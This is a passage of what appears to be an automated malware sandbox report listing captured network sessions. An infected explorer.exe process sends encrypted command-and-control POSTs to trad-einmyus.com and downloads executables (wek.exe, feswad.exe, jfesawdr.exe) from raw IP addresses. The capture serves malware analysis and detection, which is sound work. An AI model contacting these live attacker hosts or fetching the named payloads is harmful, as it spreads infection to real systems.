20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED] Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49775	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:55.404520035 CEST	283	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ncehelngswfsf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 310 Host: trad-einmyus.com
May 25, 2024 21:29:55.404572964 CEST	310	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8a 66 5d 02 c8 a1 c1 64 16 80 d0 7a Data Ascii: ?v1y5eCDhTz\Fu$f]dzh[Lb"c }k+Rjof1~C`eK%p0a.W{!1CNMYvW=9bPC1ef&mZBF(T(:ib'@V
May 25, 2024 21:29:56.295273066 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:56 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49777	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:56.417455912 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://amrbjqbtgpnr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 193 Host: trad-einmyus.com
May 25, 2024 21:29:56.417522907 CEST	193	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8b 66 5d 02 c8 a1 c1 64 31 d8 dd 75 Data Ascii: ?v1y5eCDhTz\Fu$f]d1uH\|(o@QiS)5Xecq'}b8IU1#>C{i-JIG)17ZG+]@1#xM#vFV
May 25, 2024 21:29:57.175282955 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:57 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49778	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:57.239689112 CEST	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lejcpsbnxtuxdtx.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 227 Host: trad-einmyus.com
May 25, 2024 21:29:57.239712954 CEST	227	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 88 66 5d 02 c8 a1 c1 64 5f ad bf 18 Data Ascii: ?v1y5eCDhTz\Fu$f]d_4i3Yi>8{YvM`i++9's\|%SH&OK>0nR!wS~Er.J#&vX,}?RiQE})YG }yq<
May 25, 2024 21:29:57.990695000 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:57 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49780	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:58.049560070 CEST	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://trlgbchacigdlq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 233 Host: trad-einmyus.com
May 25, 2024 21:29:58.049580097 CEST	233	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 89 66 5d 02 c8 a1 c1 64 23 c4 da 7e Data Ascii: ?v1y5eCDhTz\Fu$f]d#~1a0iS:XGO1I^oh3>2h%_U9+NJgB!vOLj]\|avz!z?K=AiH7 J(LEi*+NZyRwxFr^ z
May 25, 2024 21:29:59.018557072 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:58 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49782	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:59.082948923 CEST	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://irythjvgtsstcpv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 250 Host: trad-einmyus.com
May 25, 2024 21:29:59.083168030 CEST	250	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 86 66 5d 02 c8 a1 c1 64 2f a7 c7 33 Data Ascii: ?v1y5eCDhTz\Fu$f]d/38`7=L]`-:^Xk~I_.+o 0a2AmOfR'Q?3K$giM1P16"#z.#@)'RLUh"trj.$!mRr=
May 25, 2024 21:30:00.538767099 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:59 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED] Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
May 25, 2024 21:30:00.543560982 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:59 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED] Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49784	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:30:00.599942923 CEST	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nwelovrvoirfrsd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 283 Host: trad-einmyus.com
May 25, 2024 21:30:00.599944115 CEST	283	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 87 66 5d 02 c8 a1 c1 64 16 b2 b2 76 Data Ascii: ?v1y5eCDhTz\Fu$f]dv^O)7@qPH6ymNa6a5 .3K2@xX P<g&6%Cs>3/[i ,LT$\6b#^H\|_5v_aG<hu\tA9
May 25, 2024 21:30:01.439007044 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:30:01 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED] Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49787	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:30:01.497363091 CEST	283	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xvkfgvcftmyct.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 324 Host: trad-einmyus.com
May 25, 2024 21:30:01.497363091 CEST	324	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 84 66 5d 02 c8 a1 c1 64 2a c3 8e 14 Data Ascii: ?v1y5eCDhTz\Fu$f]d*[k3kO7X#Lkukl+BSxFCT70#(qXA1Q;'&:jwcv!2W@!Xp/U&?"0gv"SrZ
May 25, 2024 21:30:02.609781027 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:30:02 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED] Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49788	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:30:02.640033007 CEST	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jpkolefxkmrqfjw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 355 Host: trad-einmyus.com
May 25, 2024 21:30:02.640075922 CEST	355	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 85 66 5d 02 c8 a1 c1 64 5d 85 da 13 Data Ascii: ?v1y5eCDhTz\Fu$f]d]te5eWGm }J90weQNF:V\|w[p0L80qjXs.4\|W^"W,P9]#kh'(6%){6qY924H_S(
May 25, 2024 21:30:03.391330004 CEST	222	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:30:03 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 98 d6 08 5e 39 5c a2 f3 df fc fc 48 eb 0b db 69 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82O^9\HiSG0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49789	91.92.253.69	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:30:03.404542923 CEST	157	OUT	GET /wek.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 91.92.253.69

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49797	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:30:14.919115067 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://duxgasiuxdjh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 159 Host: trad-einmyus.com
May 25, 2024 21:30:14.919148922 CEST	159	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 82 66 5d 02 c8 a1 c1 64 1b 92 c6 75 Data Ascii: ?v1y5eCDhTz\Fu$f]duw!UN8X7nh1T88k=rG>2[QZ)k$"3\@f>l
May 25, 2024 21:30:15.783257008 CEST	227	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:30:15 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 47 a4 e8 dd e1 e4 40 f0 4f 91 64 b2 45 48 95 01 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:G@OdEH10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49798	185.154.13.143	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:30:15.807744026 CEST	162	OUT	GET /feswad.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 185.154.13.143

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49802	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:30:22.918329000 CEST	281	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dejiweyxqsl.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 142 Host: trad-einmyus.com
May 25, 2024 21:30:22.918329000 CEST	142	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 83 66 5d 02 c8 a1 c1 64 50 be af 32 Data Ascii: ?v1y5eCDhTz\Fu$f]dP2U'Sd+S&mqm*815.F1cL#\R0T
May 25, 2024 21:30:23.660547018 CEST	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:30:23 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc ab 15 b0 08 db 6f a7 18 5c 9b 08 bf eb 3b af 2d 50 0a f3 dd c6 5b ee 52 c6 41 83 aa 76 d2 26 eb b2 c7 18 7e 0d 0a 30 0d 0a 0d 0a Data Ascii: 41I:82OTeo\;-P[RAv&~0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49805	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:30:25.031122923 CEST	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jyqccrxyqqnpjdg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 162 Host: trad-einmyus.com
May 25, 2024 21:30:25.031122923 CEST	162	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 80 66 5d 02 c8 a1 c1 64 2e 83 a4 13 Data Ascii: ?v1y5eCDhTz\Fu$f]d.#wq,5d9.\{{0%=;tS'CVOZHyMLFw[!0$
May 25, 2024 21:30:25.770488977 CEST	235	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:30:25 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 33 34 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 de 15 49 39 41 a3 e8 dd e1 f8 5f f5 4a 89 2d bb 53 51 90 4a fb ef 2c f3 2b 42 1a ae b7 d9 57 e8 0d 0a 30 0d 0a 0d 0a Data Ascii: 34I:82OI9A_J-SQJ,+BW0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49806	193.233.132.167	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:30:25.792712927 CEST	170	OUT	GET /lend/jfesawdr.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 193.233.132.167

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49810	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:30:30.914263964 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://thhfncmsprqy.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 254 Host: trad-einmyus.com
May 25, 2024 21:30:30.914316893 CEST	254	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 81 66 5d 02 c8 a1 c1 64 5e 92 af 34 Data Ascii: ?v1y5eCDhTz\Fu$f]d^408VSW\QItoO8Pt$S!JP}j6astX1RM%"Yd2at<n^@7.o?hQgQa-@X%`)'TO;Z
May 25, 2024 21:30:31.639491081 CEST	376	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:30:31 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 63 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 bc 53 da 46 d4 f7 20 86 24 e6 ad 90 52 23 e5 b4 4c 2b f8 a5 b4 6a f6 99 bc 5d af 72 94 cb 32 45 5d 39 0f 4e df a1 3d fd d4 55 84 ac c8 42 c6 36 9d 95 69 77 64 f9 7a 3a 9c c6 9d c6 76 ed 39 08 84 5a b0 4d e3 e6 d3 36 81 c7 fc 3f d7 38 f9 fb 91 e0 01 83 c4 c3 4c 1c c3 03 ae eb b4 c0 a9 ac 4f 1c ff 74 88 d8 29 82 7b 32 45 b6 88 f9 b7 ae 1a b1 4b 64 c0 c6 ba e2 d9 ba 78 d6 27 35 60 3a 6a e8 81 03 9d 78 ab a8 af 2d 90 d6 d7 44 0d 0a 30 0d 0a 0d 0a Data Ascii: c1I:82OB%,YR("XSF $R#L+j]r2E]9N=UB6iwdz:v9ZM6?8LOt){2EKdx'5`:jx-D0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49746	188.114.96.3	443	7048	C:\Users\user\AppData\Local\Temp\E609.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:29:37 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
